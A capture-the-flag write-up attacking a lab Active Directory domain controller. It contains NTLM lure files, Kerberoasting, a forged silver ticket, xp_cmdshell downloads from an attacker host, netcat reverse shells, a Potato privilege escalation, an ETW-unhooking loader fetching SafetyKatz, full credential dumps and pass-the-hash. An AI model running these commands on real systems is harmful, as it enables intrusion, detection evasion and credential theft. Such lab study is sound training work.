vulnlab-breach

vulnlab breach

a Medium Windows machine

tools used: ntlm_theft.py, Responder, hashcat / john, nxc, impacket-getPac, impacket-GetUserSPNs, ldapdomaindump, bloodhound-python, impacket-ticketer, impacket-mssqlclient, JuicyPotatoNG.exe, evil-winrm

We generate a set of lure files that make Windows Explorer authenticate to us over SMB when a user browses (or opens) them, leaking a NetNTLMv2 response, using https://github.com/Greenwolf/ntlm_theft. The -s argument is the host the files point at, i.e. the listener that receives the authentication: our own tun0 address (Responder reports it as 10.8.2.138 below), not the target.

python ntlm_theft.py -g all -s 10.8.2.138 -f puckie
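
As an added example (this is not ntlm_theft's own code and not from the original page), here is what the two lure formats uploaded further down contain, plus a small defender-side scan that finds such files on a share. Assumptions: the listener is 10.8.2.138 (our Responder address on this page), the tag puckie as above, the placeholder URL example.invalid, and an allow-list of internal file servers containing breachdc.breach.vl. Which lure actually fires depends on the client's Windows build and on whether the user merely lists the folder or opens the file.

```python
"""Lure files for NTLM capture and a scan that spots them on a share (added example)."""
import re
import tempfile
from pathlib import Path

LISTENER_IP = "10.8.2.138"   # assumption: our Responder address, as on this page


def scf_lure(listener_ip: str, tag: str) -> str:
    """.scf (Shell Command File). Explorer reads IconFile while drawing the folder
    listing, so a UNC path here makes the client authenticate to listener_ip over SMB."""
    return (
        "[Shell]\r\n"
        "Command=2\r\n"
        f"IconFile=\\\\{listener_ip}\\share\\{tag}.ico\r\n"
        "[Taskbar]\r\n"
        "Command=ToggleDesktop\r\n"
    )


def url_lure(listener_ip: str, tag: str) -> str:
    """.url Internet Shortcut; the icon again lives on a UNC path (URL is a placeholder)."""
    return (
        "[InternetShortcut]\r\n"
        f"URL=https://example.invalid/{tag}\r\n"
        f"IconFile=\\\\{listener_ip}\\share\\{tag}.ico\r\n"
        "IconIndex=1\r\n"
    )


def write_lures(out_dir: Path, listener_ip: str, tag: str) -> list:
    """Drop both lures into out_dir (the folder later pushed to the share with mput)."""
    out_dir.mkdir(parents=True, exist_ok=True)
    bodies = {f"{tag}.scf": scf_lure(listener_ip, tag),
              f"{tag}-(icon).url": url_lure(listener_ip, tag)}
    written = []
    for name, body in bodies.items():
        path = out_dir / name
        path.write_bytes(body.encode("ascii"))
        written.append(path)
    return written


# ini-style keys Explorer dereferences; a value starting with two backslashes is a UNC path
UNC_VALUE = re.compile(r"^\s*(IconFile|URL|WorkingDirectory|ScriptFile)\s*=\s*(\\\\[^\r\n]+)",
                       re.I | re.M)


def find_unc_lures(share_dir: Path, internal_hosts=frozenset()):
    """Defender-side check: list .scf/.url files whose UNC targets are not known internal
    file servers. Run it against a writable share such as the transfer folder."""
    hits = []
    for path in sorted(share_dir.rglob("*")):
        if path.suffix.lower() not in {".scf", ".url"}:
            continue
        text = path.read_bytes().decode("utf-8", errors="replace")
        for m in UNC_VALUE.finditer(text):
            host = m.group(2)[2:].split("\\", 1)[0].lower()
            if host not in internal_hosts:
                hits.append((path.name, m.group(2)))
    return hits


def demo():
    """Generate the lures in a temp dir and scan it; returns the flagged (file, UNC) pairs."""
    with tempfile.TemporaryDirectory() as d:
        share = Path(d) / "transfer"
        write_lures(share, LISTENER_IP, "puckie")
        return find_unc_lures(share, internal_hosts={"breachdc.breach.vl"})


if __name__ == "__main__":
    for name, unc in demo():
        print(f"{name}: {unc}")
```

The scan is the mirror image of the attack: the same UNC-bearing keys that make a lure work are exactly what to grep for on shares that untrusted users can write to, and the allow-list keeps legitimate icon paths on internal servers from showing up.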

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ smbclient -N -L 10.129.212.120

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    share           Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.212.120 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Guest access to the share works without a password. The transfer folder holds per-user folders, which gives us three usernames (claire.pope, diana.pope, julia.wong) and a location users are likely to browse:

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ smbclient \\\\10.129.212.120\\share -U Guest 
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Sep  8 13:13:00 2025
  ..                                DHS        0  Tue Sep  9 12:35:32 2025
  finance                             D        0  Thu Feb 17 12:19:34 2022
  software                            D        0  Thu Feb 17 12:19:12 2022
  transfer                            D        0  Mon Sep  8 12:13:44 2025

        7863807 blocks of size 4096. 1504600 blocks available
smb: \> cd transfer
smb: \transfer\> ls
  .                                   D        0  Mon Sep  8 12:13:44 2025
  ..                                  D        0  Mon Sep  8 13:13:00 2025
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
  diana.pope                          D        0  Thu Feb 17 12:21:19 2022
  julia.wong                          D        0  Thu Apr 17 02:38:12 2025

        7863807 blocks of size 4096. 1498643 blocks available
smb: \transfer\> 

Upload the lure files into transfer. (The lcd path below is misspelled, untlm_theft, so the chdir fails, but smbclient was started inside the puckie directory, so mput still picks up the generated files from there.)

┌──(puck㉿kali)-[~/vulnlab/breach/ntlm_theft/puckie]
└─$ smbclient //10.129.212.120/share -U "Guest"%"" -c 'prompt OFF; cd transfer; lcd /home/puck/vulnlab/breach/untlm_theft/puckie; mput *' 

chdir to /home/puck/vulnlab/breach/untlm_theft/puckie failed (No such file or directory)
putting file puckie-(url).url as \transfer\puckie-(url).url (1.7 kb/s) (average 1.7 kb/s)
putting file puckie.scf as \transfer\puckie.scf (2.6 kb/s) (average 2.1 kb/s)
putting file puckie-(icon).url as \transfer\puckie-(icon).url (3.5 kb/s) (average 2.6 kb/s)

Responder listens on tun0. When a user opens the transfer folder (here julia.wong), Explorer tries to fetch the icons from our UNC path and authenticates, handing us her NetNTLMv2 response:

┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx


[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b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
[*] Skipping previously captured hash for BREACH\Julia.Wong

The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.

hashcat -a 0 -m 5600 julia_wong.txt /usr/share/wordlists/rockyou.txt

The response cracks to Computer1. Confirm the credential over SMB with nxc (signing:True also tells us that relaying NTLM to SMB on the DC is not an option):

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nxc smb 10.129.212.120 -u 'julia.wong' -p 'Computer1'       
SMB         10.129.212.120  445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.129.212.120  445    BREACHDC         [+] breach.vl\julia.wong:Computer1 

Kerberoasting and the domain SID

Two things come out of authenticated Kerberos requests here. getPac asks the KDC for a ticket carrying a PAC (KERB_VALIDATION_INFO) and prints the Domain SID, which the silver ticket step later needs. GetUserSPNs then Kerberoasts: svc_mssql, the SQL Server service account, has a servicePrincipalName (MSSQLSvc/breachdc.breach.vl:1433), and any authenticated domain user can request a service ticket for an SPN. That ticket is encrypted with a key derived from the service account's password (for RC4/etype 23, its NT hash), so it can be cracked offline.

First the SID:

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   2560514102 
    dwHighDateTime:                  30942228 
LogoffTime:                     
--snip--

Domain SID: S-1-5-21-2330692793-3312915120-706255856

 0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?
                                                                                                                     

 

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778             



$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$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
                                                                                                                     

The hash cracks in seconds with either john (which auto-detects krb5tgs) or hashcat (mode 13100); the password is Trustno1:

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ john svc*_sql_hash.txt -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1         (?)     
1g 0:00:00:00 DONE (2025-10-29 09:44) 25.00g/s 1331Kp/s 1331Kc/s 1331KC/s chloelouise..spook
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ hashcat svc_sql.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode

$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$27587cd9b5f8f5fed557b2e02028dfb3$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:Trustno1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssq...feea1b

Enumerating the domain

ldapdomaindump writes users, groups and computers into grep-able files. The svc_mssql entry confirms the domain SID prefix (the account SID minus its RID, 1115):

┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                     
cat domain_users.grep | grep svc 
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115

and we collect BloodHound data for the graph view:

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69 

Silver ticket with the NT hash of svc_mssql

A silver ticket is a forged service ticket. To build one we need the domain SID (from getPac above), the service account's Kerberos key and the SPN. For RC4/etype 23 the key is simply the NT hash of the password, MD4 over the UTF-16LE encoding of Trustno1, which is why the one-liner below reproduces the rc4_hmac_nt value mimikatz dumps at the end of this page. The MSSQL service decrypts the ticket with its own key and trusts the PAC inside it, which says we are Administrator; the KDC never sees a request.

┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c


impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache
                                                                                                                     
export KRB5CCNAME=administrator.ccache

mssqlclient -k takes the ticket from the ccache. The host must be given as the FQDN from the SPN (breachdc.breach.vl, resolvable e.g. via /etc/hosts) so the client requests exactly the service name our ticket was forged for:
┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 

Enabling xp_cmdshell

SQL Server accepted the ticket and logged us in as BREACH\Administrator, which is sysadmin here, so we can switch xp_cmdshell on. Keep in mind that xp_cmdshell runs commands as the SQL Server service account, not as the SQL login:

SQL (BREACH\Administrator  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\"
output                                                       
----------------------------------------------------------   
 Volume in drive C has no label.                             

 Volume Serial Number is B465-02B6                           

NULL                                                         

 Directory of C:\                                            

NULL                                                         

08/19/2021  06:24 AM    <DIR>          EFI                   

02/17/2022  09:55 AM    <DIR>          inetpub               

05/08/2021  08:20 AM    <DIR>          PerfLogs              

02/17/2022  10:28 AM    <DIR>          Program Files         

02/17/2022  10:27 AM    <DIR>          Program Files (x86)   

02/17/2022  02:11 PM    <DIR>          share                 

02/17/2022  01:12 PM    <DIR>          Users                 

02/17/2022  03:35 PM    <DIR>          Windows               

               0 File(s)              0 bytes                

               8 Dir(s)  11,722,678,272 bytes free           

NULL                                                       

                         

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output   
------   
NULL     

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\Temp"
output                                               
--------------------------------------------------   
 Volume in drive C has no label.                     

 Volume Serial Number is B465-02B6                   

NULL                                                 

 Directory of C:\Temp                                

NULL                                                 

06/07/2024  10:34 AM    <DIR>          .             

06/07/2024  10:34 AM            45,272 nc64.exe      

               1 File(s)         45,272 bytes        

               1 Dir(s)  11,754,811,392 bytes free   

NULL                                                 

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"

Privesc with JuicyPotatoNG

The shell lands as breach\svc_mssql, the SQL Server service account (the silver ticket only made us Administrator inside SQL). whoami /priv shows SeImpersonatePrivilege, which service accounts hold by default, so a Potato-style token impersonation gets us SYSTEM. In the JuicyPotatoNG call below, -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -l 443 is the local port its fake COM server listens on (unrelated to our reverse-shell port 445), and -p / -a are the program and arguments to run as SYSTEM.

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe                                                    
-a----          6/7/2024  10:34 AM          45272 nc64.exe                                                             


PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>

┌──(puck㉿kali)-[~/vulnlab/breach]
rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC


Beyond root

With SYSTEM on the DC we can pull credential material from LSASS. Loader.exe is a custom in-memory loader (not covered on this page) that fetches SafetyKatz and hands it mimikatz commands; the evasive-* names are renamed commands whose output matches sekurlsa::ekeys and lsadump::lsa /patch. Two things stand out in the key dump: svc_mssql's rc4_hmac_nt is exactly the NT hash we computed from Trustno1, and its aes256_hmac key would have let us forge the same silver ticket with AES instead of RC4, which blends in better on a domain where AES is the default.

"cmd /c C:\Users\Public\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe sekurlsa::evasive-keys exit"

C:\Windows\system32>C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe sekurlsa::evasive-keys exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://10.10.14.34:8000/SafetyKatz.exe Arguments :

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/



mimikatz(commandline) # sekurlsa::evasive-keys

Authentication Id : 0 ; 8335143 (00000000:007f2f27)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 10/29/2025 9:34:28 AM
SID               : S-1-5-96-0-3

         * Username : BREACHDC$
         * Domain   : breach.vl
         * Password : 52 2d 49 84 34 de f5 43 a7 09 a8 1a ef 8d e0 25 70 e8 66 9f eb d8 64 05 8f c3 90 70 0d 77 88 36 e4 22 08 80 86 26 9c f4 02 46 1e c9 8d 8e 7e 50 b8 d2 fe 6c 32 cc be f1 c8 a0 cf f5 f6 bd cb a3 4a 8c cc 94 28 7b b9 49 b7 23 84 65 80 0d 7c bc 33 ca 4b ac d3 6e 27 a8 1e 3e 22 7c f2 f3 f2 b1 21 3b c7 38 d6 cc be 50 5c bf 1e cf 55 e8 cc 48 90 43 fc 51 7e c0 1f 4d 17 6b df 8c e9 59 c1 a3 27 03 4e 6f b5 a1 69 99 a1 55 28 16 fe e5 ed e7 5b 64 1c cb 90 ae 7f db e9 da 5f e8 25 cc e5 74 30 41 92 d8 5d 59 bd c8 b9 d9 cc 6f d8 2d d2 3b 4b c9 31 5e fa ae 57 c4 0a b3 0a f8 52 24 37 e8 33 f6 37 1c f4 bb 69 61 23 65 98 d1 0a 72 4e 1a 7f 78 37 ce ec 13 d1 11 44 da bc 3e 4c f1 70 48 12 f9 1b e7 3b f8 a1 49 73 27 8f 0e 9d 8e b1 71
         * Key List :
           aes256_hmac       57db133d25ef4c3119e44df6fb3052a6009d1b11c2cbf77711d67f0c048e0a0e
           aes128_hmac       4379b623157e83033c8afb60dfdf5536
           rc4_hmac_nt       dd953936e414a1c2e1b4e1a062aa4a22
           rc4_hmac_old      dd953936e414a1c2e1b4e1a062aa4a22
           rc4_md4           dd953936e414a1c2e1b4e1a062aa4a22
           rc4_hmac_nt_exp   dd953936e414a1c2e1b4e1a062aa4a22
           rc4_hmac_old_exp  dd953936e414a1c2e1b4e1a062aa4a22

--snip--

Authentication Id : 0 ; 528552 (00000000:000810a8)
Session           : Service from 0
User Name         : svc_mssql
Domain            : BREACH
Logon Server      : BREACHDC
Logon Time        : 10/29/2025 8:15:23 AM
SID               : S-1-5-21-2330692793-3312915120-706255856-1115

         * Username : svc_mssql
         * Domain   : BREACH.VL
         * Password : (null)
         * Key List :
           aes256_hmac       acb4bc05dee5b6cd685b7f54810327378726f441e1a780406bfdf5ffeec1686a
           rc4_hmac_nt       69596c7aa1e8daee17f8e78870e25a5c
           rc4_hmac_old      69596c7aa1e8daee17f8e78870e25a5c
           rc4_md4           69596c7aa1e8daee17f8e78870e25a5c
           rc4_hmac_nt_exp   69596c7aa1e8daee17f8e78870e25a5c
           rc4_hmac_old_exp  69596c7aa1e8daee17f8e78870e25a5c

Authentication Id : 0 ; 513330 (00000000:0007d532)
Session           : Interactive from 1
User Name         : julia.wong
Domain            : BREACH
Logon Server      : BREACHDC
Logon Time        : 10/29/2025 8:15:13 AM
SID               : S-1-5-21-2330692793-3312915120-706255856-1106

         * Username : Julia.Wong
         * Domain   : BREACH.VL
         * Password : (null)
         * Key List :
           aes256_hmac       24870ecb6cd96aa3b89c3b6f24076f3e0ea76dd14e2f21b52037e6b6e5494c11
           rc4_hmac_nt       b4c8a5ef4dd292edd06b613d2c518ddc
           rc4_hmac_old      b4c8a5ef4dd292edd06b613d2c518ddc
           rc4_md4           b4c8a5ef4dd292edd06b613d2c518ddc
           rc4_hmac_nt_exp   b4c8a5ef4dd292edd06b613d2c518ddc
           rc4_hmac_old_exp  b4c8a5ef4dd292edd06b613d2c518ddc

--snip--



mimikatz(commandline) # exit
Bye!

C:\Windows\system32>

Then dump the NT hashes of every domain account (on a domain controller lsadump::lsa /patch reads them all, krbtgt and machine accounts included):
"cmd /c C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"

C:\Windows\system32>C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://10.10.14.34:8000/SafetyKatz.exe Arguments : lsadump::evasive-lsa /patch exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/



mimikatz(commandline) # lsadump::evasive-lsa /patch
Domain : BREACH / S-1-5-21-2330692793-3312915120-706255856

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : ebb948d32f7e896aa0d3934ec7a1b868

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 051e1c9e689e7e4c9fb7164433b9ba8e

RID  : 00000451 (1105)
User : Claire.Pope
LM   :
NTLM : 407269bacd94665e972e2c61c1de7a15

RID  : 00000452 (1106)
User : Julia.Wong
LM   :
NTLM : b4c8a5ef4dd292edd06b613d2c518ddc

RID  : 00000453 (1107)
User : Hilary.Reed
LM   :
NTLM : 39da4813065bd52215fb5614b956873b

RID  : 00000454 (1108)
User : Diana.Pope
LM   :
NTLM : ee1458cde3182d47514a107afd1236f2

RID  : 00000455 (1109)
User : Jasmine.Price
LM   :
NTLM : 4c8c779f1e48435bb0bf235afd921988

RID  : 00000456 (1110)
User : George.Williams
LM   :
NTLM : 8a3891bd96479611d4eec391ca592519

RID  : 00000457 (1111)
User : Lawrence.Kaur
LM   :
NTLM : 2ed316bf52a9f155fc25440fae777d0f

RID  : 00000458 (1112)
User : Jasmine.Slater
LM   :
NTLM : 6df17991ea82048f8f03734f1f4449c8

RID  : 00000459 (1113)
User : Hugh.Watts
LM   :
NTLM : 656f2dbe61c431b5ca58a1a5001d51f6

RID  : 0000045a (1114)
User : Christine.Bruce
LM   :
NTLM : 74eeaab55e418b6247ea35db833da742

RID  : 0000045b (1115)
User : svc_mssql
LM   :
NTLM : 69596c7aa1e8daee17f8e78870e25a5c

RID  : 00001bbd (7101)
User : puck
LM   :
NTLM : 6dfcb20c87d04f9a4f9605f2413395d4

RID  : 000003e8 (1000)
User : BREACHDC$
LM   :
NTLM : dd953936e414a1c2e1b4e1a062aa4a22

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>

Finally, pass the Administrator NT hash over WinRM (evil-winrm -H):
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ evil-winrm -i breach.vl -u Administrator -H ebb948d32f7e896aa0d3934ec7a1b868 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 
